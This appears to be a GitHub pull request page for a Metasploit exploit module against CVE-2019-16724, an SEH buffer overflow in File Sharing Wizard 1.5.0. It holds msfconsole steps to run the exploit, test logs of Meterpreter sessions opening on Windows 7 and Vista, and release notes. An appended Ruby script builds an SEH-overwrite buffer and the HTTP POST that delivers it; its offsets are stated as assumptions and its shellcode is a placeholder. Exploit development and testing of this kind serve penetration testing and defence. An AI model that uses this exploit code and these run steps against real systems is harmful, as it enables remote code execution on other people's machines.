
File sharing wizard seh module CVE 2019-16724 #12400

Merged: 14 commits, Oct 8, 2019

Conversation

dwelch-r7 (Contributor) commented Oct 4, 2019

Adds a new module for exploiting CVE-2019-16724 in File Sharing Wizard version 1.5.0.

Tested against Windows 7 32-bit SP1.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Run the exploit:
use exploit/windows/http/file_sharing_wizard_seh
set RHOST 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD windows/x64/exec
set CMD calc.exe
run
  • Verify calc pops up

bcoles (Contributor) commented Oct 5, 2019

Tested on Win 7 Ultimate SP1 (x86) - (with a few edits as per above review).

msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.222:80 - Connecting to target
[*] 172.16.191.222:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 172.16.191.222
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.222:49227) at 2019-10-05 07:31:12 -0400

meterpreter > getuid
Server username: WIN-7-ULTIMATE-\user
meterpreter > sysinfo
Computer        : WIN-7-ULTIMATE-
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

bcoles (Contributor) commented Oct 5, 2019

Also works on Windows Vista Home Premium (x86).

msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 172.16.191.223:80 - Connecting to target
[*] 172.16.191.223:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 172.16.191.223
[*] Meterpreter session 3 opened (172.16.191.165:4444 -> 172.16.191.223:49258) at 2019-10-05 13:13:16 -0400

meterpreter > sysinfo
Computer        : LH-MPPGQR2OWECW
OS              : Windows Vista (6.0 Build 6000).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > 

Use strings in info hash, port is an integer, remove version number from name
@busterb busterb self-assigned this Oct 8, 2019
@bcook-r7 bcook-r7 merged commit 951fd7b into rapid7:master Oct 8, 2019
busterb (Member) commented Oct 8, 2019

Release Notes

This adds an exploit module for CVE-2019-16724 in File Sharing Wizard version 1.5.0. It allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.
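For readers unfamiliar with the bug class named in the release notes, the following is an added example and is not code from the module or from the rapid7 project. It sketches, in Ruby (the language Metasploit modules are written in), the standard SEH-overwrite buffer such an exploit sends and wraps it in the HTTP POST the vulnerable service parses: filler up to the exception registration record, a short jump in the nSEH slot, a pop/pop/ret address in the SEH slot, a NOP sled and the shellcode. The offset (OFFSET_TO_NSEH), the gadget address (POP_POP_RET), the parameter name (PARAM_NAME) and the stand-in shellcode are all assumptions for illustration, not the real values for File Sharing Wizard 1.5.0; the module's actual offsets and gadgets are not reproduced here.

```ruby
# Added example: NOT code from the Metasploit module or the rapid7 project.
# Sketches the classic SEH-overwrite buffer that exploits of this class
# (SEH-based stack overflow via an HTTP POST parameter) send, and wraps
# it in the HTTP request. Every offset, address and parameter name here
# is an assumption for illustration, not a real value for File Sharing
# Wizard 1.5.0 / CVE-2019-16724.

OFFSET_TO_NSEH = 1024        # assumed: bytes of filler before the nSEH slot
POP_POP_RET    = 0x1001a4b2  # assumed: pop/pop/ret gadget in a module built without SafeSEH
PARAM_NAME     = 'filename'  # assumed: name of the overflowed POST parameter
SLED_SIZE      = 16

# Bytes that cannot survive a raw x-www-form-urlencoded body: NUL, LF, CR, '&', '='.
BAD_CHARS = "\x00\x0a\x0d&=".b.bytes

# nSEH: "jmp short +6" (eb 06) followed by two NOPs. After pop/pop/ret
# executes, EIP lands here; the 2-byte jmp skips its own two NOPs plus the
# 4-byte SEH record and continues into the NOP sled.
NSEH = "\xeb\x06\x90\x90".b

# Pack the handler address as the x86 stack stores it: 32-bit little-endian.
def seh_record(address)
  [address].pack('V')
end

# Layout: [filler][nSEH][SEH = pop/pop/ret][NOP sled][shellcode]
def build_seh_buffer(shellcode, offset: OFFSET_TO_NSEH, ppr: POP_POP_RET, sled: SLED_SIZE)
  buf = 'A'.b * offset
  buf << NSEH
  buf << seh_record(ppr)
  buf << ("\x90".b * sled)
  buf << shellcode.b
  buf
end

# Offsets of the two overwritten SEH fields inside the buffer.
def nseh_offset(offset = OFFSET_TO_NSEH)
  offset
end

def seh_offset(offset = OFFSET_TO_NSEH)
  offset + 4
end

# True if any byte would be mangled by the form-body transport; a gadget
# address containing a NUL, for instance, cannot be used here.
def contains_bad_chars?(buf)
  buf.b.bytes.any? { |b| BAD_CHARS.include?(b) }
end

# Wrap the buffer in the POST the vulnerable service parses.
def build_post_request(host, path, buf)
  body = "#{PARAM_NAME}=".b + buf.b
  headers = "POST #{path} HTTP/1.1\r\n" \
            "Host: #{host}\r\n" \
            "Content-Type: application/x-www-form-urlencoded\r\n" \
            "Content-Length: #{body.bytesize}\r\n" \
            "Connection: close\r\n\r\n"
  headers.b + body
end

if __FILE__ == $PROGRAM_NAME
  # Constructed stand-in for real shellcode: eight int3 breakpoints.
  dummy_shellcode = "\xcc".b * 8
  buf = build_seh_buffer(dummy_shellcode)
  abort('bad characters in buffer') if contains_bad_chars?(buf)
  request = build_post_request('192.0.2.10', '/', buf)
  puts "nSEH at #{nseh_offset}, SEH at #{seh_offset}, request #{request.bytesize} bytes"
end
```

The bad-character check is the part worth keeping in mind when porting a proof of concept to a module: the SEH address, the jump and the shellcode all travel inside a form parameter, so any byte the server's parser strips or terminates on (NUL in particular) breaks the chain, and the gadget has to be chosen accordingly.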

@dwelch-r7 dwelch-r7 deleted the ms-4659-file-sharing-wizard-module branch October 8, 2019 12:45
@tperry-r7 tperry-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 14, 2019
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)

8 participants